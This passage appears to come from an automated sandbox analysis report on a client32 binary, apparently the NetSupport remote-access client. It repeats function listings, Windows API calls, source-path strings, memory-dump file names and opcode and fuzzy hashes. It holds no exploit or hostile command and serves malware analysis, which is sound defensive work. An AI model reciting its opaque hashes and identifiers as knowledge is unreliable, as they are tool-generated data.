                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                  • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                  • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                  • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                  Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                  • API String ID: 175691280-2052047905
                                                                                  • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                  • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                  • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                  • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                  Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                  • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                  • API String ID: 1134434899-3115850912
                                                                                  • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                  • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                  • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                  • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                  Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                  • m_hWnd, xrefs: 110151F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                  • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                  • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                  • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                  Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: QueueUserWorkItem
                                                                                  • API String ID: 199729137-2469634949
                                                                                  • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                  • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                  • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                  • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                  Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread__wcstoi64
                                                                                  • String ID: *TapiFixPeriod$Bridge
                                                                                  • API String ID: 1152747075-2058455932
                                                                                  • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                  • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                  • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                  • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                  Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: FlashWindowEx
                                                                                  • API String ID: 199729137-2859592226
                                                                                  • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                  • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                  • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                  • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                  Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                  • m_hWnd, xrefs: 110010A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2046328329-2830328467
                                                                                  • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                  • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                  • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                  • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                  Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                  • m_hWnd, xrefs: 11001066
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 819365019-2830328467
                                                                                  • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                  • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                  • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                  • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                  Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                  • m_hWnd, xrefs: 110010F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 906220102-2830328467
                                                                                  • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                  • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                  • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                  • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                  Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                  • m_hWnd, xrefs: 110151B6
                                                                                  Memory Dump Source
